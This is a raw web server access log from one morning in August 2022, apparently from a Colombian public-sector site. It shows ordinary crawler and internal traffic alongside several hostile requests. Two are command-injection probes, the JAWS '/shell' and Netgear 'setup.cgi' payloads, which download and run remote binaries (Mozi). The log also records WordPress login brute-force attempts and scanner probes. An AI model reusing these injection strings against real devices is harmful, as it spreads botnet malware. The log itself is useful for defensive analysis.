201.245.192.253 - - [29/Aug/2022:03:11:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
172.22.2.4 - - [29/Aug/2022:03:09:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:03:10:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55211
216.245.221.92 - - [29/Aug/2022:03:12:35 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Aug/2022:03:16:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
172.22.2.4 - - [29/Aug/2022:03:14:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54814
172.22.2.4 - - [29/Aug/2022:03:15:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [29/Aug/2022:03:17:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:03:16:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58946
69.171.230.120 - - [29/Aug/2022:03:18:08 -0500] "GET /images/Acuerdos1.jpeg HTTP/1.1" 200 59889
201.245.192.253 - - [29/Aug/2022:03:19:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41862
201.245.192.253 - - [29/Aug/2022:03:19:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42447
95.108.213.10 - - [29/Aug/2022:03:20:39 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:03:21:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
157.55.39.8 - - [29/Aug/2022:03:22:30 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
216.245.221.92 - - [29/Aug/2022:03:22:35 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.36 - - [29/Aug/2022:03:22:35 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
207.46.13.36 - - [29/Aug/2022:03:22:35 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
172.22.2.4 - - [29/Aug/2022:03:21:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:03:22:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
92.118.39.88 - - [29/Aug/2022:03:24:11 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [29/Aug/2022:03:25:26 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [29/Aug/2022:03:26:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
207.46.13.186 - - [29/Aug/2022:03:26:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20851-900/885.tif HTTP/1.1" 200 71348
172.22.2.4 - - [29/Aug/2022:03:25:27 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 63198
216.245.221.92 - - [29/Aug/2022:03:27:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:03:27:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Aug/2022:03:29:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41862
201.245.192.253 - - [29/Aug/2022:03:29:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42447
172.22.2.4 - - [29/Aug/2022:03:28:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57716
198.20.69.98 - - [29/Aug/2022:03:30:11 -0500] "GET / HTTP/1.1" 200 319
198.20.69.98 - - [29/Aug/2022:03:30:24 -0500] "GET /sitemap.xml HTTP/1.1" 404 1018
198.20.69.98 - - [29/Aug/2022:03:30:25 -0500] "GET /.well-known/security.txt HTTP/1.1" 404 1018
198.20.69.98 - - [29/Aug/2022:03:30:29 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
87.250.224.25 - - [29/Aug/2022:03:30:39 -0500] "-" 408 -
34.91.15.99 - - [29/Aug/2022:03:30:40 -0500] "GET / HTTP/1.1" 200 319
34.91.15.99 - - [29/Aug/2022:03:30:40 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [29/Aug/2022:03:31:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
216.245.221.92 - - [29/Aug/2022:03:32:35 -0500] "HEAD / HTTP/1.1" 200 -
35.195.93.98 - - [29/Aug/2022:03:33:00 -0500] "GET / HTTP/1.1" 200 319
2.57.122.98 - - [29/Aug/2022:03:33:41 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [29/Aug/2022:03:33:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:03:33:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54814
201.245.192.253 - - [29/Aug/2022:03:36:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
157.55.39.80 - - [29/Aug/2022:03:36:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%20900-949.tif HTTP/1.1" 200 4091182
172.22.2.4 - - [29/Aug/2022:03:36:32 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [29/Aug/2022:03:36:33 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
216.245.221.92 - - [29/Aug/2022:03:37:35 -0500] "HEAD / HTTP/1.1" 200 -
40.77.190.249 - - [29/Aug/2022:03:38:26 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
40.77.190.58 - - [29/Aug/2022:03:38:26 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
40.77.189.81 - - [29/Aug/2022:03:38:26 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
40.77.189.167 - - [29/Aug/2022:03:38:26 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
40.77.189.185 - - [29/Aug/2022:03:38:27 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
201.245.192.253 - - [29/Aug/2022:03:39:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41862
201.245.192.253 - - [29/Aug/2022:03:39:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42447
172.22.2.4 - - [29/Aug/2022:03:38:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
213.180.203.74 - - [29/Aug/2022:03:40:39 -0500] "-" 408 -
172.22.2.4 - - [29/Aug/2022:03:40:54 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-746-12.docx HTTP/1.1" 200 22637
201.245.192.253 - - [29/Aug/2022:03:41:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
172.22.2.4 - - [29/Aug/2022:03:39:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
216.245.221.92 - - [29/Aug/2022:03:42:35 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.161 - - [29/Aug/2022:03:44:30 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:03:45:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
157.55.39.8 - - [29/Aug/2022:03:46:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20851-900/859.tif HTTP/1.1" 200 233304
172.22.2.4 - - [29/Aug/2022:03:44:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:03:45:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60865
216.245.221.92 - - [29/Aug/2022:03:47:35 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.100 - - [29/Aug/2022:03:50:00 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [29/Aug/2022:03:50:01 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
27.124.5.28 - - [29/Aug/2022:03:50:19 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
27.124.5.28 - - [29/Aug/2022:03:50:19 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
27.124.5.28 - - [29/Aug/2022:03:50:18 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
27.124.5.28 - - [29/Aug/2022:03:50:20 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
27.124.5.28 - - [29/Aug/2022:03:50:27 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
27.124.5.28 - - [29/Aug/2022:03:50:27 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
27.124.5.28 - - [29/Aug/2022:03:50:27 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
27.124.5.28 - - [29/Aug/2022:03:50:27 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
87.250.224.4 - - [29/Aug/2022:03:50:39 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:03:50:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
172.22.2.4 - - [29/Aug/2022:03:50:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [29/Aug/2022:03:52:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:03:51:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
27.124.5.28 - - [29/Aug/2022:03:55:02 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110281
201.245.192.253 - - [29/Aug/2022:03:55:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
216.245.221.92 - - [29/Aug/2022:03:57:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:03:56:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:03:57:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
5.45.207.149 - - [29/Aug/2022:04:00:39 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:04:00:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
216.245.221.92 - - [29/Aug/2022:04:02:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:04:02:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [29/Aug/2022:04:02:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:04:03:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53994
201.245.192.253 - - [29/Aug/2022:04:05:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
172.22.2.4 - - [29/Aug/2022:04:06:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.245.221.92 - - [29/Aug/2022:04:07:34 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:04:08:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:04:08:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
5.255.253.175 - - [29/Aug/2022:04:10:39 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:04:10:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
157.55.39.8 - - [29/Aug/2022:04:11:47 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [29/Aug/2022:04:12:34 -0500] "HEAD / HTTP/1.1" 200 -
5.45.207.134 - - [29/Aug/2022:04:14:54 -0500] "-" 408 -
5.45.207.68 - - [29/Aug/2022:04:14:59 -0500] "-" 408 -
95.108.213.2 - - [29/Aug/2022:04:15:05 -0500] "-" 408 -
95.108.213.61 - - [29/Aug/2022:04:15:10 -0500] "-" 408 -
87.250.224.67 - - [29/Aug/2022:04:15:25 -0500] "-" 408 -
172.22.2.4 - - [29/Aug/2022:04:13:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
87.250.224.72 - - [29/Aug/2022:04:15:40 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:04:15:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
87.250.224.34 - - [29/Aug/2022:04:16:10 -0500] "-" 408 -
172.22.2.4 - - [29/Aug/2022:04:14:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
87.250.224.139 - - [29/Aug/2022:04:17:10 -0500] "-" 408 -
216.245.221.92 - - [29/Aug/2022:04:17:35 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.186 - - [29/Aug/2022:04:17:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2903.pdf HTTP/1.1" 304 -
141.8.142.94 - - [29/Aug/2022:04:18:10 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:04:19:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42028
201.245.192.253 - - [29/Aug/2022:04:19:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42458
5.255.253.178 - - [29/Aug/2022:04:20:11 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:04:20:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
172.22.2.4 - - [29/Aug/2022:04:19:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:04:20:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
216.245.221.92 - - [29/Aug/2022:04:22:34 -0500] "HEAD / HTTP/1.1" 200 -
5.45.207.98 - - [29/Aug/2022:04:23:10 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:04:25:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
207.46.13.16 - - [29/Aug/2022:04:25:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%20CONJUNTAS/Resolucion%20conjunta%20No.%20001-2017.pdf HTTP/1.1" 304 -
172.22.2.4 - - [29/Aug/2022:04:25:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
92.118.39.30 - - [29/Aug/2022:04:27:30 -0500] "GET http://example.com/ HTTP/1.1" 200 319
216.245.221.92 - - [29/Aug/2022:04:27:34 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:04:26:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
5.45.207.150 - - [29/Aug/2022:04:28:10 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:04:29:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42028
201.245.192.253 - - [29/Aug/2022:04:29:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42458
201.245.192.253 - - [29/Aug/2022:04:30:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
216.245.221.92 - - [29/Aug/2022:04:32:34 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:04:31:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:04:32:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55211
207.46.13.36 - - [29/Aug/2022:04:34:50 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
201.245.192.253 - - [29/Aug/2022:04:35:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
87.250.224.174 - - [29/Aug/2022:04:36:10 -0500] "-" 408 -
216.245.221.92 - - [29/Aug/2022:04:37:34 -0500] "HEAD / HTTP/1.1" 200 -
35.208.187.63 - - [29/Aug/2022:04:38:23 -0500] "HEAD /BLA/resoluciones/RESOLUCIONES%202017/0520.pdf HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:04:37:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Aug/2022:04:39:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42028
201.245.192.253 - - [29/Aug/2022:04:39:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42458
172.22.2.4 - - [29/Aug/2022:04:38:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
201.245.192.253 - - [29/Aug/2022:04:40:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
157.55.39.8 - - [29/Aug/2022:04:42:09 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 219900
216.245.221.92 - - [29/Aug/2022:04:42:34 -0500] "HEAD / HTTP/1.1" 200 -
185.142.236.40 - - [29/Aug/2022:04:43:14 -0500] "GET / HTTP/1.1" 200 319
185.142.236.40 - - [29/Aug/2022:04:43:21 -0500] "GET /sitemap.xml HTTP/1.1" 404 1018
185.142.236.40 - - [29/Aug/2022:04:43:29 -0500] "GET /.well-known/security.txt HTTP/1.1" 404 1018
172.22.2.4 - - [29/Aug/2022:04:43:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:04:43:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [29/Aug/2022:04:45:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
5.255.253.166 - - [29/Aug/2022:04:46:10 -0500] "-" 408 -
172.22.2.4 - - [29/Aug/2022:04:46:37 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [29/Aug/2022:04:46:37 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [29/Aug/2022:04:46:37 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [29/Aug/2022:04:46:37 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [29/Aug/2022:04:46:37 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [29/Aug/2022:04:46:38 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [29/Aug/2022:04:46:38 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [29/Aug/2022:04:46:38 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [29/Aug/2022:04:46:38 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [29/Aug/2022:04:46:38 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [29/Aug/2022:04:46:38 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [29/Aug/2022:04:46:38 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [29/Aug/2022:04:46:39 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [29/Aug/2022:04:46:39 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [29/Aug/2022:04:46:39 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [29/Aug/2022:04:46:39 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [29/Aug/2022:04:46:39 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [29/Aug/2022:04:46:39 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [29/Aug/2022:04:46:39 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [29/Aug/2022:04:46:44 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [29/Aug/2022:04:46:44 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [29/Aug/2022:04:46:44 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [29/Aug/2022:04:46:45 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [29/Aug/2022:04:46:52 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [29/Aug/2022:04:46:54 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [29/Aug/2022:04:47:18 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
216.245.221.92 - - [29/Aug/2022:04:47:34 -0500] "HEAD / HTTP/1.1" 200 -
40.77.139.66 - - [29/Aug/2022:04:47:52 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
172.22.2.4 - - [29/Aug/2022:04:46:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61387
185.119.81.105 - - [29/Aug/2022:04:48:57 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [29/Aug/2022:04:48:58 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
192.241.215.241 - - [29/Aug/2022:04:49:07 -0500] "GET /hudson HTTP/1.1" 404 1018
172.22.2.4 - - [29/Aug/2022:04:48:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Aug/2022:04:50:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
172.22.2.4 - - [29/Aug/2022:04:49:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58946
216.245.221.92 - - [29/Aug/2022:04:52:34 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.16 - - [29/Aug/2022:04:54:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0229.pdf HTTP/1.1" 200 374229
47.31.252.165 - - [29/Aug/2022:04:54:32 -0500] "-" 408 -
79.184.155.68 - - [29/Aug/2022:04:54:47 -0500] "-" 408 -
69.63.184.4 - - [29/Aug/2022:04:55:10 -0500] "GET /distrito-entrego-certificado-de-reconocimiento-a-mas-de-600-mujeres-que-reverdecen-tras-seis-meses-de-formacion-teorica-y-practica.html HTTP/1.1" 206 1113
207.46.13.115 - - [29/Aug/2022:04:55:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20851-900/865.tif HTTP/1.1" 200 457048
45.115.252.166 - - [29/Aug/2022:04:55:42 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [29/Aug/2022:04:55:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
58.69.115.85 - - [29/Aug/2022:04:56:01 -0500] "-" 408 -
5.45.207.140 - - [29/Aug/2022:04:56:10 -0500] "-" 408 -
179.26.146.125 - - [29/Aug/2022:04:56:12 -0500] "-" 408 -
142.113.212.8 - - [29/Aug/2022:04:56:24 -0500] "-" 408 -
172.22.2.4 - - [29/Aug/2022:04:54:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:04:55:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
216.245.221.92 - - [29/Aug/2022:04:57:34 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.164 - - [29/Aug/2022:04:59:28 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:05:00:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
172.22.2.4 - - [29/Aug/2022:05:00:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [29/Aug/2022:05:02:34 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:05:01:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
172.22.2.4 - - [29/Aug/2022:05:04:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
201.245.192.253 - - [29/Aug/2022:05:05:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
5.255.231.250 - - [29/Aug/2022:05:06:11 -0500] "-" 408 -
103.29.68.35 - - [29/Aug/2022:05:06:24 -0500] "GET / HTTP/1.0" 200 319
114.119.132.34 - - [29/Aug/2022:05:06:27 -0500] "-" 408 -
173.252.79.2 - - [29/Aug/2022:05:07:02 -0500] "GET /images/jardines-verticales-4-marzo.jpg HTTP/1.1" 200 54804
216.245.221.92 - - [29/Aug/2022:05:07:34 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.40 - - [29/Aug/2022:05:08:04 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [29/Aug/2022:05:06:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:05:07:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53994
198.20.69.98 - - [29/Aug/2022:05:10:13 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:05:10:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
41.37.232.253 - - [29/Aug/2022:05:10:53 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+synns.cf/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
216.245.221.92 - - [29/Aug/2022:05:12:34 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.80 - - [29/Aug/2022:05:12:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/6809.pdf HTTP/1.1" 200 381100
185.119.81.105 - - [29/Aug/2022:05:12:56 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [29/Aug/2022:05:12:57 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [29/Aug/2022:05:12:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:05:13:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56005
201.245.192.253 - - [29/Aug/2022:05:15:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
87.250.224.76 - - [29/Aug/2022:05:16:11 -0500] "-" 408 -
216.245.221.92 - - [29/Aug/2022:05:17:34 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Aug/2022:05:19:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42950
201.245.192.253 - - [29/Aug/2022:05:19:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42301
172.22.2.4 - - [29/Aug/2022:05:18:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:05:18:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [29/Aug/2022:05:20:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
216.245.221.92 - - [29/Aug/2022:05:22:34 -0500] "HEAD / HTTP/1.1" 200 -
103.181.57.247 - - [29/Aug/2022:05:24:55 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.181.57.247:36748/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
128.14.209.162 - - [29/Aug/2022:05:24:59 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [29/Aug/2022:05:25:04 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8326
172.22.2.4 - - [29/Aug/2022:05:25:04 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
103.29.68.35 - - [29/Aug/2022:05:25:20 -0500] "GET /nmaplowercheck1661768612 HTTP/1.1" 404 1043
103.29.68.35 - - [29/Aug/2022:05:25:21 -0500] "GET /HNAP1 HTTP/1.1" 404 1043
172.22.2.4 - - [29/Aug/2022:05:23:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
